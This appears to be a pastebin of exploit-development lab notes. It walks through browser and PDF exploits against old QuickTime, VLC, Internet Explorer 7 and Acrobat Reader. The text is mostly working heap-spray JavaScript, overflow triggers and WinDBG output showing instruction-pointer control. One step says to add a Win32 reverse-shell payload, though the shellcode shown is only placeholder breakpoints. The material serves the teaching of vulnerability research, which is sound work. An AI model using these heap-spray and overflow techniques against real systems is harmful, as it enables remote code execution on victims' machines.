joemccray

Browser Exploits

Dec 4th, 2015
  1. ################################
  2. # Lab 1: Overflows in browsers #
  3. ################################
  4.  
  5. QuickTime overflow: if we send a very long rtsp:// URL, QuickTime crashes
  6. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  7.  
  8. <object id=quicktime clsid="999-999999-99-99999">
  9. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  10. </object>
  11.  
  12. var buf = "";
  13. for(i = 0; i < 50000; i++)
  14. buf += "A";
  15. var myobject = document.getElementById("quicktime");
  16. myobject.url = buf;
  17.  
  18. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  19.  
  20. - Browsers (Flash)
  21. - PDF
  22. - MS Office / OOo
  23.  
  24. VLC smb:// exploit
  25. ------------------
  26.  
  27. EXPLOIT VECTOR
  28.  
  29. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  30.  
  31. Exploit Scripts
  32. - ffvlc
  33.  
  34. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  35.  
  36. perl daemon.py vlc0.html
  37.  
  38. ON YOUR XPIE8 VM, START FIREFOX
  39. Browse to http://your_host_ip_address:8080/
  40.  
  41. vlc0.html
  42. ---------
  43. <script>
  44. var buf = "";
  45. for(i = 0; i < 1250; i++)
  46. buf += unescape("%41%41%41%41");
  47. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  48. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  49. </script>
  50.  
  51. vlc1.html
  52. ---------
  53. <script>
  54.  
  55. // shellcode created in heap memory
  56. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  57.  
  58. // 800K block of NOPS
  59. var nop = unescape("%u9090%u09090"); // 4 NOPS
  60. while(nop.length < 0xc0000) {
  61. nop += nop;
  62. }
  63.  
  64. // spray the heap with NOP+shellcode
  65. var memory = new Array();
  66. for(i = 0; i < 50; i++) {
  67. memory[i] = nop + shellcode;
  68. }
  69.  
  70. // build the exploit payload
  71. var buf = "";
  72. for(i = 0; i < 1250; i++)
  73. buf += unescape("%41%41%41%41");
  74. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  75.  
  76. // trigger the exploit
  77. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  78. </script>
  79.  
  80. perl daemon.py vlc1.html
  81.  
  82. Search for where our NOPS+shellcode lies in the heap
  83.  
  84. s 0 l fffffff 90 90 90 90 cc cc cc cc
  85.  
  86. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  87. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  88. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  89. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  90. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  91. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  92. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  93. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  94. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  95. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  96. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  97. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  98. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  99. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  100. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  101. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  102. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  103.  
  104. Edit vlc2.html
  105. replace %41%41%41%41 with %07%07%07%07
  106.  
  107. (928.fd0): Break instruction exception - code 80000003 (first chance)
  108. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  109. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  110. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  111. 07100000 cc int 3
  112. 0:019> u
  113. 07100000 cc int 3
  114. 07100001 cc int 3
  115. 07100002 cc int 3
  116. 07100003 cc int 3
  117. 07100004 cc int 3
  118. 07100005 cc int 3
  119. 07100006 cc int 3
  120. 07100007 cc int 3
  121.  
  122. Create vlc3.html (Copy vlc2.html to vlc3.html)
  123. ----------------------------------------------
  124. Win32 Reverse Shell
  125. - no restricted characters
  126. - Encoder NONE
  127. - use the Javascript encoded payload generated by msfweb
  128.  
  129. USE AFTER FREE
  130. --------------
  131.  
  132. struct {
  133. int a;
  134. int b;
  135. void (*add)();
  136. char c[20];
  137. } s1, s2;
  138.  
  139. s1.a = 3;
  140. s1.b = 4;
  141. s1.add = my_add_func();
  142. strcpy(s1.c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAA");
  143. :
  144. :
  145. s2.add(x, y);
  146. :
  147.  
  148. Exploit scripts
  149. ie7-ms09002
  150.  
  151. perl daemon.py ie7imgtag0.html
  152.  
  153. First chance exceptions are reported before any exception handling.
  154. This exception may be expected and handled.
  155. eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
  156. eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0 nv up ei pl nz na po nc
  157. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  158. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Internet Explorer Collection\IE700\mshtml.dll -
  159. mshtml!DllGetClassObject+0x4ec28:
  160. 7e8999cb ff5104 call dword ptr [ecx+4] ds:0023:41420003=????????
  161.  
  162. WHENEVER YOU HAVE A CRASH WHERE YOU FAULT ON:
  163.  
  164. call dword ptr [reg + N]
  165.  
  166. You control the reg value (completely or partially)
  167.  
  168. You have an exploitable vtable overwrite.
  169.  
  170. u eip-3 <--- check 3 instructions before the crash
  171. 0:005> u eip-3
  172. mshtml!DllGetClassObject+0x4ec25:
  173. 7e8999c8 8b08 mov ecx,dword ptr [eax]
  174. 7e8999ca 50 push eax
  175. 7e8999cb ff5104 call dword ptr [ecx+4]
  176.  
  177. dd eax
  178. 0:005> dd eax
  179. 025445a0 4141ffff 00420042 00420042 00420042
  180. 025445b0 00420042 00420042 00420042 00420042
  181. 025445c0 00420042 00420042 00420042 00420042
  182. 025445d0 00420042 00000042 e8b9ce43 ff080100
  183.  
  184. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
  185.  
  186. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  187. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  188. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  189. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  190. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  191. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  192. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  193. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  194. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  195. :
  196. :
  197.  
  198. EAX register ends up pointing to one of these src values
  199. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
  200.  
  201. EAX points to ---> 4141ffff B B B B B B ...
  202. mov ecx, [eax]
  203. - what will ecx be? ECX = 4141ffff
  204. push eax
  205. call dword ptr [ecx+4]
  206. - EIP will jump to whatever is at memory location 4141ffff+4 = 41420003
  207.  
  208. ie7imgtag1.html
  209. ---------------
  210.  
  211. var buf = unescape("%u0606%u0606BBBBBBBBBBBBBBBBBBBBBBBBB");
  212.  
  213. EAX points to ---> 0606ffff B B B B B B ...
  214. mov ecx, [eax]
  215. - ecx = 0606ffff
  216.  
  217. call [ecx+4]
  218. - call [06070003]
  219.  
  220. Do we control the memory at 06070003?
  221.  
  222. dd 04040404 ........ 90 90 90 90 90 90 90
  223. dd 05050505 ........ 90 90 90 90 90 90 90
  224. dd 06060606 ........ 90 90 90 90 90 90 90
  225.  
  226. 06070003 --> 90909090
  227.  
  228. dd 07070707 ........ 90 90 90 90 90 90 90
  229.  
  230. EIP = 90909090 (whatever is stored at location 06070003)
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237. #######################
  238. # Lab 2: PDF EXPLOITS #
  239. #######################
  240.  
  241. Acrobat Media newPlayer exploit
  242. -------------------------------
  243.  
  244. Use-after-free bug
  245.  
  246. Exploit scripts are online at 172.16.0.100
  247. - adobe_mnp
  248.  
  249. Download these scripts on your XPIE8 VM itself.
  250.  
  251.  
  252. mnp0.pdf
  253.  
  254. - Open up acrobat reader
  255. - WinDBG
  256. - F6 attach to AcroRd32.exe
  257. - g to Go
  258.  
  259. EIP = 41414141
  260.  
  261. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  262.  
  263. mnp1.pdf
  264.  
  265. All we are doing is changing EIP to 0c0c0c0c.
  266. There is no heap spray in this one.
  267.  
  268. This exception may be expected and handled.
  269. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  270. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  271. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  272. 0c0c0c0c ?? ???
  273.  
  274. We know we get EIP control
  275.  
  276. mnp2.pdf
  277.  
  278. Put in the heap spray.
  279.  
  280. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  281.  
  282. var nops = unescape("%u9090%u9090");
  283.  
  284. while(nops.length <= 32768)
  285. nops += nops;
  286. nops = nops.substring(0,32768 - shellcode.length);
  287.  
  288. memory = new Array();
  289.  
  290. for(i = 0; i < 1500; i++) {
  291. memory[i] = nops + shellcode;
  292. }
  293.  
  294. 1500 NOP+shellcode blocks of 32K NOPs each
  295.  
  296. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  297.  
  298. We want to see what led to the crash.
  299.  
  300. EIP is invalid, so we can't disassemble around EIP
  301.  
  302. We need to trace the function that called us and crashed.
  303. - STACK TRACE
  304. - Dumps all the frames from the top of the stack.
  305. - shows you the series of calls that led up to the crash.
  306. - we will analyze the topmost function on the stack.
  307.  
  308. WinDBG - stack trace - "k" command
  309.  
  310. 0:000> k
  311. ChildEBP RetAddr
  312. WARNING: Frame IP not in any known module. Following frames may be wrong.
  313. 0013fb34 2d843117 0x90909090
  314. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  315. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  316. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  317. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  318. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  319. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  320. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  321. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  322. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  323. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  324. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  325. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  326. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  327. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  328. 0013ffc0 7c817067 AcroRd32+0x4004
  329. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  330.  
  331. 2d843117 -- the return address we would have returned to, had we not crashed.
  332. At address 2d843117-2 we expect to find a CALL instruction.
  333.  
  334. u 2d843117
  335. u 2d843117-2
  336. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  337. u 2d843117-4
  338.  
  339. 0:000> u 2d843117-3
  340. Multimedia!PlugInMain+0x41b66:
  341. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  342. 2d843117 6a00 push 0
  343. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  344. 2d84311e 56 push esi
  345. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  346. 2d843124 83c40c add esp,0Ch
  347. 2d843127 66b80100 mov ax,1
  348. 2d84312b 5e pop esi
  349.  
  350. We control EDX
  351. edx=0c0c0c0c
  352.  
  353. call [edx+4] = call [0c0c0c10]
  354. dd edx+4
  355.  
  356. 0:000> dd edx+4
  357. 0c0c0c10 90909090 90909090 90909090 90909090
  358. 0c0c0c20 90909090 90909090 90909090 90909090
  359.  
  360. 0:000> u 2d843117-7
  361. Multimedia!PlugInMain+0x41b62:
  362. 2d843110 8b10 mov edx,dword ptr [eax]
  363. 2d843112 8bc8 mov ecx,eax
  364. 2d843114 ff5204 call dword ptr [edx+4]
  365.  
  366. dd eax
  367.  
  368. 0:000> dd eax
  369. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  370. 02e2d690 42424242 42424242 42424242 42424242
  371. 02e2d6a0 42424242 42424242 42424242 42424242
  372. 02e2d6b0 42424242 42424242 42424242 42424242
  373. 02e2d6c0 42424242 42424242 00000000 00000000
  374.  
  375. mnp3.pdf
  376.  
  377. change the NOPs 90909090 to 0c0c0c0c
  378.  
  379. mov edx, [eax]
  380. call [edx+4]
  381.  
  382. edx = 0c0c0c0c
  383. edx+4 = 0c0c0c10
  384. contents at edx+4 will also be "0c0c0c0c"
  385.  
  386. EIP will jump to 0c0c0c0c
  387.  
  388. and...
  389.  
  390. 0:000> u 0c0c0c0c
  391. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  392. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  393. 0c0c0c0c 0c0c or al,0Ch
  394. 0c0c0c0e 0c0c or al,0Ch
  395. 0c0c0c10 0c0c or al,0Ch
  396. 0c0c0c12 0c0c or al,0Ch
  397. 0c0c0c14 0c0c or al,0Ch